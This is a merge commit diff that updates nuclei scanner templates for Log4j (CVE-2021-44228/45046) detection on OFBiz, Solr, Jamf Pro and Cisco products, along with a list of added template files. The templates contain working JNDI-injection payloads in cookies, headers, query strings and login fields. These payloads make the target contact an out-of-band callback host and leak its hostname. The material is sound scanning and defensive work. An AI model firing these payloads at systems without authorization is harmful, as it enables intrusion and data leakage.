Merge pull request #7170 from projectdiscovery/update-log4j

Update All Existing Log4j Templates

.new-additions

@@ -1,51 +1,55 @@
-file/keys/postman-api-key.yaml
-headless/technologies/sap-spartacus.yaml
-http/cves/2017/CVE-2017-17731.yaml
-http/cves/2020/CVE-2020-27481.yaml
-http/cves/2021/CVE-2021-27314.yaml
-http/cves/2021/CVE-2021-27315.yaml
-http/cves/2021/CVE-2021-27316.yaml
-http/cves/2021/CVE-2021-27319.yaml
-http/cves/2021/CVE-2021-27320.yaml
-http/cves/2021/CVE-2021-30175.yaml
-http/cves/2021/CVE-2021-44228.yaml
-http/cves/2022/CVE-2022-24264.yaml
-http/cves/2022/CVE-2022-24265.yaml
-http/cves/2022/CVE-2022-24266.yaml
-http/cves/2022/CVE-2022-24716.yaml
-http/cves/2022/CVE-2022-27984.yaml
-http/cves/2022/CVE-2022-27985.yaml
-http/cves/2022/CVE-2022-3980.yaml
-http/cves/2022/CVE-2022-42095.yaml
-http/cves/2022/CVE-2022-42096.yaml
-http/cves/2022/CVE-2022-4328.yaml
-http/cves/2022/CVE-2022-45037.yaml
-http/cves/2022/CVE-2022-45038.yaml
-http/cves/2022/CVE-2022-46020.yaml
-http/cves/2023/CVE-2023-1020.yaml
-http/cves/2023/CVE-2023-1671.yaml
-http/cves/2023/CVE-2023-20864.yaml
-http/cves/2023/CVE-2023-25135.yaml
-http/cves/2023/CVE-2023-26360.yaml
-http/cves/2023/CVE-2023-27350.yaml
-http/cves/2023/CVE-2023-27524.yaml
-http/cves/2023/CVE-2023-29489.yaml
-http/cves/2023/CVE-2023-29922.yaml
-http/cves/2023/CVE-2023-30210.yaml
-http/cves/2023/CVE-2023-30212.yaml
-http/cves/2023/CVE-2023-31059.yaml
-http/cves/2023/CVE-2023-32235.yaml
-http/default-logins/powerjob-default-login.yaml
-http/default-logins/umami/umami-default-login.yaml
-http/exposed-panels/oracle-opera-login.yaml
-http/exposed-panels/papercut-ng-panel.yaml
-http/exposed-panels/proxmox-panel.yaml
-http/exposed-panels/red-lion-panel.yaml
-http/exposed-panels/sophos-web-appliance.yaml
-http/exposures/tokens/postman/postman-key.yaml
-http/misconfiguration/apache/apache-zeppelin-unauth.yaml
-http/osint/mail-archive.yaml
-http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
-http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
-http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
-http/vulnerabilities/wordpress/wpml-xss.yaml
+cves/2017/CVE-2017-16894.yaml
+cves/2020/CVE-2020-10199.yaml
+cves/2021/CVE-2021-25078.yaml
+cves/2021/CVE-2021-35250.yaml
+cves/2022/CVE-2022-0747.yaml
+cves/2022/CVE-2022-0769.yaml
+cves/2022/CVE-2022-0773.yaml
+cves/2022/CVE-2022-0846.yaml
+cves/2022/CVE-2022-0864.yaml
+cves/2022/CVE-2022-1903.yaml
+cves/2022/CVE-2022-2219.yaml
+cves/2022/CVE-2022-24223.yaml
+cves/2022/CVE-2022-25485.yaml
+cves/2022/CVE-2022-25486.yaml
+cves/2022/CVE-2022-25487.yaml
+cves/2022/CVE-2022-25488.yaml
+cves/2022/CVE-2022-25489.yaml
+cves/2022/CVE-2022-25497.yaml
+cves/2022/CVE-2022-27926.yaml
+cves/2022/CVE-2022-28032.yaml
+cves/2022/CVE-2022-3062.yaml
+cves/2022/CVE-2022-37190.yaml
+cves/2022/CVE-2022-37191.yaml
+cves/2022/CVE-2022-38295.yaml
+cves/2022/CVE-2022-38296.yaml
+cves/2022/CVE-2022-38467.yaml
+cves/2022/CVE-2022-41441.yaml
+cves/2022/CVE-2022-42094.yaml
+cves/2022/CVE-2022-4321.yaml
+cves/2023/CVE-2023-0099.yaml
+cves/2023/CVE-2023-22620.yaml
+cves/2023/CVE-2023-22897.yaml
+cves/2023/CVE-2023-27008.yaml
+cves/2023/CVE-2023-27159.yaml
+cves/2023/CVE-2023-27179.yaml
+cves/2023/CVE-2023-29084.yaml
+default-logins/trassir/trassir-default-login.yaml
+exposed-panels/appwrite-panel.yaml
+exposed-panels/aspect-control-panel.yaml
+exposures/logs/yii-error-page.yaml
+misconfiguration/apollo-adminservice-unauth.yaml
+misconfiguration/default-spx-key.yaml
+misconfiguration/sql-server-report-viewer.yaml
+misconfiguration/thinkphp-errors.yaml
+network/detection/msmq-detect.yaml
+network/enumeration/beanstalk-service.yaml
+osint/hashnode.yaml
+osint/imgbb.yaml
+osint/rubygems.yaml
+technologies/default-apache-shiro.yaml
+technologies/switch-protocol.yaml
+vulnerabilities/generic/cache-poisoning-xss.yaml
+vulnerabilities/huawei/huawei-firewall-lfi.yaml
+vulnerabilities/others/universal-media-xss.yaml
+vulnerabilities/wordpress/ldap-wp-login-xss.yaml

http/cves/2021/CVE-2021-45046.yaml

@@ -55,19 +55,23 @@ http:
       - type: regex
         part: interactsh_request
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
     extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
       - type: regex
         part: interactsh_request
         group: 2
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output
 
       - type: regex
         part: interactsh_request
         group: 1
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
 # Enhanced by mp on 2022/02/28

http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml

@@ -22,12 +22,16 @@ info:
     shodan-query: http.html:"Apache OFBiz"
   tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
 
+variables:
+  rand1: '{{rand_int(111, 999)}}'
+  rand2: '{{rand_int(111, 999)}}'
+
 http:
   - raw:
       - |
         GET /webtools/control/main HTTP/1.1
         Host: {{Hostname}}
-        Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
+        Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}}
 
     matchers-condition: and
     matchers:
@@ -39,13 +43,23 @@ http:
       - type: regex
         part: interactsh_request
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
     extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 2
+        regex:
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output
+
       - type: regex
         part: interactsh_request
         group: 1
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
 # Enhanced by mp on 2022/05/27

http/vulnerabilities/apache/apache-solr-log4j-rce.yaml

@@ -24,11 +24,15 @@ info:
     shodan-query: http.html:"Apache Solr"
   tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
 
+variables:
+  rand1: '{{rand_int(111, 999)}}'
+  rand2: '{{rand_int(111, 999)}}'
+
 http:
   - raw:
       - |
         @timeout: 25s
-        GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1
+        GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
         Host: {{Hostname}}
 
     attack: clusterbomb
@@ -52,10 +56,21 @@ http:
       - type: regex
         part: interactsh_request
         regex:
-          - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
     extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 2
+        regex:
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output
+
       - type: regex
         part: interactsh_request
+        group: 1
         regex:
-          - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml

@@ -23,6 +23,10 @@ info:
     verified: "true"
   tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
 
+variables:
+  rand1: '{{rand_int(111, 999)}}'
+  rand2: '{{rand_int(111, 999)}}'
+
 http:
   - raw:
       - |
@@ -32,7 +36,7 @@ http:
         Referer: {{RootURL}}
         Content-Type: application/x-www-form-urlencoded
 
-        username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
+        username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
 
     matchers-condition: and
     matchers:
@@ -41,21 +45,31 @@ http:
         words:
           - "dns"
 
-      - type: regex
-        part: interactsh_request
-        regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable
-
       - type: word
         part: body
         words:
           - "<title>Jamf Pro Login</title>"
 
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
+
     extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 2
+        regex:
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output
+
       - type: regex
         part: interactsh_request
         group: 1
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
 # Enhanced by mp on 2022/05/27

http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml → http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml

@@ -22,13 +22,17 @@ info:
     shodan-query: title:"CloudCenter Suite"
   tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
 
+variables:
+  rand1: '{{rand_int(111, 999)}}'
+  rand2: '{{rand_int(111, 999)}}'
+
 http:
   - raw:
       - |
         @timeout: 10s
         POST /suite-auth/login HTTP/1.1
         Host: {{Hostname}}
-        Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
+        Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
         Content-Type: application/json
 
         {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
@@ -43,7 +47,7 @@ http:
       - type: regex
         part: interactsh_request
         regex:
-          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
       - type: word
         part: header
@@ -55,10 +59,16 @@ http:
         kval:
           - interactsh_ip # Print remote interaction IP in output
 
+      - type: regex
+        part: interactsh_request
+        group: 2
+        regex:
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output
+
       - type: regex
         part: interactsh_request
         group: 1
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
 # Enhanced by md on 2023/03/22

http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml

@@ -20,6 +20,10 @@ info:
     verified: "true"
   tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
 
+variables:
+  rand1: '{{rand_int(111, 999)}}'
+  rand2: '{{rand_int(111, 999)}}'
+
 http:
   - raw:
       - |
@@ -29,7 +33,7 @@ http:
         Origin: {{BaseURL}}
         Referer: {{BaseURL}}/ccmadmin/showHome.do
 
-        appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
+        appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin
 
     matchers-condition: and
     matchers:
@@ -41,17 +45,23 @@ http:
       - type: regex
         part: interactsh_request
         regex:
-          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
     extractors:
       - type: kval
         kval:
           - interactsh_ip # Print remote interaction IP in output
 
+      - type: regex
+        part: interactsh_request
+        group: 2
+        regex:
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output
+
       - type: regex
         part: interactsh_request
         group: 1
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
+          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 
 # Enhanced by md on 2022/10/04